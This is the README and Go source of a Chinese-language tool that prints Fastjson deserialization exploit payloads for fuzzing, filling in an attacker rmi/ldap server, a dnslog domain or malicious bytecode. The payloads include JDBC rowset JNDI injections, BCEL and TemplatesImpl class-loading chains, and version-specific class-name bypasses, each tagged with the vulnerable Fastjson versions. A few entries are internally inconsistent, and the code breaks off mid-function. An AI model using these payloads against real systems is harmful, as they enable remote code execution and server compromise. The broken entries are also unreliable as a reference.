
Fastjson的payload收集


What

无第三方依赖
收集了网络上的多种payload,方便进行fuzz测试
提供了自动替换payload的功能,一次性为所有payload插入rmi地址/dnslog

Help

--list:以清单的形式打印,方便作为字典进行fuzz

--address:服务器地址(无需rmi://前缀),如11.22.33.44/exp、eval.com/rce

--dns:dnslog的地址,不同payload会添加不同的子域名,方便查看是哪一条payload

--code:加载恶意类的code,需要自行添加$$BCEL$$的开头

Example

FjsonShowPload.exe --list --address hackserver.com --dns dnslog.com

FjsonShowPload.exe --address hackserver.com --dns dnslog.com

注意:重定向到文件后,需要去掉banner和结尾的确认信息,或者直接在代码中去除

How

将代码保存为 FjsonSoPload.go

进入命令行窗口:go build ./

即可得到一个 FjsonSoPload.exe

Code

package main

import (
	"flag"
	"fmt"
)

// Package-level state shared by main, the payload builders and ShowPayload.
var (
	id = 1     // running payload number printed by ShowPayload
	dt = false // true when details are shown; main sets it from the --list flag
	cl = true  // declared but not referenced anywhere else in this file
)

// Command-line inputs, filled in by main after flag.Parse.
var (
	code    string // --code, spliced into the driverClassName/_bytecodes payloads
	Address string // --address, spliced into the rmi:// and ldap:// payloads
	dnslog  string // --dns, spliced into the dns:// payloads
)

// Scratch strings each payload builder fills before calling ShowPayload:
// Pal is the payload, Hep its description, Vson its version note.
var Pal, Hep, Vson string

// main prints the banner, reads the four flags (--list, --code, --dns,
// --address) into the package-level variables, then calls each payload
// builder in turn. At exit it echoes the dnslog and Address values that
// were used, so a redirected listing can be matched to its inputs.
func main() {
	fmt.Println(" ████████  ██                            ████████ ██                          ███████   ██                         ██\n░██░░░░░  ░░                            ██░░░░░░ ░██                         ░██░░░░██ ░██                        ░██\n░██        ██  ██████  ██████  ███████ ░██       ░██       ██████  ███     ██░██   ░██ ░██  ██████   ██████       ░██\n░███████  ░██ ██░░░░  ██░░░░██░░██░░░██░█████████░██████  ██░░░░██░░██  █ ░██░███████  ░██ ██░░░░██ ░░░░░░██   ██████\n░██░░░░   ░██░░█████ ░██   ░██ ░██  ░██░░░░░░░░██░██░░░██░██   ░██ ░██ ███░██░██░░░░   ░██░██   ░██  ███████  ██░░░██\n░██     ██░██ ░░░░░██░██   ░██ ░██  ░██       ░██░██  ░██░██   ░██ ░████░████░██       ░██░██   ░██ ██░░░░██ ░██  ░██\n░██    ░░███  ██████ ░░██████  ███  ░██ ████████ ░██  ░██░░██████  ███░ ░░░██░██       ███░░██████ ░░████████░░██████\n░░      ░░░  ░░░░░░   ░░░░░░  ░░░   ░░ ░░░░░░░░  ░░   ░░  ░░░░░░  ░░░    ░░░ ░░       ░░░  ░░░░░░   ░░░░░░░░  ░░░░░░ \n")

	// The flag is called "list" but the variable records "show details":
	// passing --list turns the boxed detail output off (see the negation below).
	detail := flag.Bool("list", false, "不展示payload细节与利用方式(默认展示)")
	code2 := flag.String("code", "恶意code", "恶意code,自行添加$$BCEL$$开头")

	dnslog2 := flag.String("dns", "default.com", "dnslog")
	Address2 := flag.String("address", "127.0.0.1/exp", "rmi/ldap地址(无需带协议名)")

	flag.Parse()
	dt = !(*detail) // dt == true means ShowPayload prints the full box
	dnslog = *dnslog2
	code = *code2
	Address = *Address2
	// Printed last, after every payload, so the inputs appear at the end of a redirected run.
	defer fmt.Println("\nYour input :", dnslog, " | ", Address)
	// BasicDataSource + BCEL ClassLoader, for both tomcat-dbcp package names
	Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource()

	// JdbcRowSetImpl JNDI variants (rmi / ldap / dns)
	Show_com_sun_rowset_JdbcRowSetImpl()

	// JdbcRowSetImpl JNDI, "L...;" class-name variant (labelled < 1.2.41)
	Bypass25_41_com_sun_rowset_JdbcRowSetImpl()

	// JdbcRowSetImpl JNDI, "LL...;;" class-name variant (labelled 1.2.41 <= v < 1.2.42)
	Bypass41_42_com_sun_rowset_JdbcRowSetImpl()
	// Cache variant, < 1.2.47. Not emitted from here; other() prints the same template:
	//{ "a": { "@type": "java.lang.Class",  "val": "com.sun.rowset.JdbcRowSetImpl"},  "b": { "@type": "com.sun.rowset.JdbcRowSetImpl",  "dataSourceName": "rmi://ip:9999/exp",  "autoCommit": true}}

	// BCEL chain, "L...;" class-name variant
	Bypass25_41_BasicDataSource()
	other()
	//fmt.Println("\nspring\\tomcat Echo")

}

// Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource prints the two
// BasicDataSource entries that pair a BCEL ClassLoader with the --code
// value as driverClassName: one for the "dbcp" package name and one for
// "dbcp2". Both are labelled Fastjson <= 1.2.24 and JDK < 8u251; they differ
// only in the tomcat-dbcp version the label names. No network address is
// used, which is what the description string means by "no egress needed".
func Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource() {
	Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`
	Hep = `BCEL加载恶意字节码的利用链,正连加载恶意字节码,无需出网`
	Vson = `Fastjson <= 1.2.24、tomcat-dbcp <= 7、JDK < 8u251`

	ShowPayload(Pal, Hep, Vson)
	// Same template with the dbcp2 package name.
	Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`
	Hep = `BCEL加载恶意字节码的利用链,正连加载恶意字节码,无需出网`
	Vson = `Fastjson <= 1.2.24、tomcat-dbcp > 7、JDK < 8u251`
	ShowPayload(Pal, Hep, Vson)
}

// Show_com_sun_rowset_JdbcRowSetImpl prints the plain JdbcRowSetImpl
// template three times, with dataSourceName set to rmi://<Address>,
// ldap://<Address> and dns://poc1.<dnslog>. All three are labelled
// Fastjson <= 1.2.24. The "poc1" label is what distinguishes this entry
// from the other dns:// entries when a lookup shows up on the dnslog side.
func Show_com_sun_rowset_JdbcRowSetImpl() {
	// Template (the ### placeholder is replaced by the rmi:// / ldap:// value below):
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	// ldap variant
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	// dnslog variant
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://poc1.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)
}

// Bypass25_41_BasicDataSource prints the dbcp2 BasicDataSource/BCEL entry
// with both @type values written in "L<class>;" descriptor form. It is
// labelled Fastjson < 1.2.41. The same string is printed again near the end
// of other().
func Bypass25_41_BasicDataSource() {
	// The template comment below is copied from the JdbcRowSetImpl entries and
	// does not describe this payload, which uses driverClassName, not dataSourceName.
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
	Hep = `BCEL利用链exp,正连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)

}

// other prints the remaining collected entries. Each group is introduced by
// a comment holding the template as collected ($type$://$ip$/payloadN is
// the placeholder, the trailing #Fastjson<=x is the version the source gave)
// and is then emitted up to three times: rmi://<Address>, ldap://<Address>
// and a dns:// name under <dnslog>. Every dns:// entry carries its own
// subdomain label (ubm, mik, jds, ...) so a lookup seen on the dnslog side
// can be traced back to the entry that produced it. Groups that take
// bytecode via --code (BCEL, TemplatesImpl) are emitted once. The version
// labels are printed verbatim from the source; the tool itself does not
// verify them.
func other() {
	// Same JdbcRowSetImpl template as above, with the "@type" and "dataSourceName"
	// keys written as \u escapes. #Fastjson <=1.2.24
	//{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"$type$://$ip$/payload2","autoCommit":true}} #Fastjson <=1.2.24
	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"dns://ubm.` + dnslog + `","autoCommit":true}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	// Three class-name spellings collected for later versions; only the third
	// ("[...", with the stray "[{") is emitted here, the first two are handled
	// by the Bypass25_41 / Bypass41_42 functions.
	//{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload3","autoCommit":true} #Fastjson<=1.2.41
	//{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload4","autoCommit":true} #Fastjson<=1.2.42
	//{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"$type$://$ip$/payload5","autoCommit":true} #Fastjson<=1.2.43
	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"dns://mik.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)

	// MyBatis JndiDataSourceFactory, value in properties.data_source.
	//{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"$type$://$ip$/payload6"}} #Fastjson<=1.2.45
	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"dns://jds.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)

	// Two-key form: "a" names the class via java.lang.Class, "b" is the JdbcRowSetImpl entry.
	//{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"$type$://$ip$/payload7","autoCommit":true}} #Fastjson<=1.2.47
	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://dbjn.` + dnslog + `","autoCommit":true}}`
	Hep = `dnsliog` // typo in the printed label, kept as the source has it
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)

	// xbean JndiConverter, value in AsText. The source tags this group CVE-2020-8840.
	//{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"$type$://$ip$/payload8"} #Fastjson<=1.2.62,CVE-2020-8840
	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"dns://cben.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)

	// Ignite CacheJndiTmLookup, value in jndiNames.
	//{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"$type$://$ip$/payload9"} #Fastjson<=1.2.66
	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"dns://igjt.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	// Anteros DBCP config, value in metricRegistry.
	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"$type$://$ip$/payload10"} #Fastjson<=1.2.66
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"dns://atbc.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	// iBATIS JtaTransactionConfig, value in properties.UserTransaction (with a space after "properties":).
	//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload11"}} #Fastjson<=1.2.66
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"dns://eget.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	// Anteros DBCP config again, this time via healthCheckRegistry.
	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload12"} #Fastjson<=1.2.67
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"dns://antr.` + dnslog + `"}`
	Hep = `dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	// Shiro JndiRealmFactory, value as the single element of jndiNames.
	//{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["$type$://$ip$/payload13"],"Realms":[""]} #Fastjson<=1.2.67
	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["rmi://` + Address + `"],"Realms":[""]}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://` + Address + `"],"Realms":[""]}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["dns://siro.` + dnslog + `"],"Realms":[""]}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	// Resin ResourceRef, value in lookupName.
	//{"@type":"com.caucho.config.types.ResourceRef","lookupName":"$type$://$ip$/payload14"} #Fastjson<=1.2.67
	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"dns://caco.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	// JtaTransactionConfig again: identical to the 1.2.66 group above except for
	// the missing space after "properties": and the version label.
	//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload15"}} #Fastjson<=1.2.67
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"dns://jti.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	// Shiro JndiObjectFactory, value in resourceName.
	//{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"$type$://$ip$/payload16"} #Fastjson<=1.2.68
	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"dns://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://w9.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	// Hadoop-shaded HikariConfig, value in metricRegistry.
	//{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"$type$://$ip$/payload17"} #Fastjson<=1.2.68
	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"dns://ppx.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	// commons-configuration JNDIConfiguration, value in prefix. Version unknown per the source.
	//{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"$type$://$ip$/payload18"} #unknown
	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://` + Address + `"}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://` + Address + `"}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"dns://cons.` + dnslog + `"}`
	Hep = `dnslog`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	// OpenJPA RegistryManagedRuntime, value in registryName. Version unknown per the source.
	//{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"$type$://$ip$/payload19","rollbackOnly":null} #unknown
	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"rmi://` + Address + `","rollbackOnly":null}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"ldap://` + Address + `","rollbackOnly":null}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"dns://openjpa.` + dnslog + `","rollbackOnly":null}`
	Hep = `dnslog`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	// The template comment below (AnterosDBCPConfig/healthCheckRegistry) does not
	// match the string emitted: this is the same dbcp2 BasicDataSource/BCEL entry
	// that Bypass25_41_BasicDataSource already printed, now labelled "unknown".
	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload20"} #unknown
	Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
	Hep = `bcel`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	// TemplatesImpl (JDK-internal package), --code spliced into _bytecodes. One entry, no address.
	//{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}
	Pal = `{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
	Hep = `加载恶意类`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	// TemplatesImpl2.tpl: same shape with the standalone xalan package name.
	//{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}
	Pal = `{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
	Hep = `加载恶意类`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
}

// Bypass25_41_com_sun_rowset_JdbcRowSetImpl prints the JdbcRowSetImpl
// template with @type written in "L<class>;" descriptor form, once each for
// rmi://<Address>, ldap://<Address> and dns://poc2.<dnslog>. All three are
// labelled Fastjson < 1.2.41. Note the dns label "poc2" is also used by the
// "LL...;;" variant below, so those two entries are not distinguishable on
// the dnslog side.
func Bypass25_41_com_sun_rowset_JdbcRowSetImpl() {
	// Template (the plain class name; this function emits the "L...;" spelling):
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)

	// ldap variant
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)

	// dnslog variant
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)
}

// Bypass41_42_com_sun_rowset_JdbcRowSetImpl prints the JdbcRowSetImpl
// template with the "L" prefix and ";" suffix doubled ("LL<class>;;"), once
// each for rmi://<Address>, ldap://<Address> and dns://poc2.<dnslog>. The
// labels give 1.2.41 <= Fastjson < 1.2.42 (the first one has a leading space
// in the printed string). The dns label "poc2" is shared with the single-L
// variant above, so the two cannot be told apart on the dnslog side.
func Bypass41_42_com_sun_rowset_JdbcRowSetImpl() {
	// Template (the plain class name; this function emits the "LL...;;" spelling):
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连,类名前后双写L与;进行绕过`
	Vson = ` 1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)

	// ldap variant
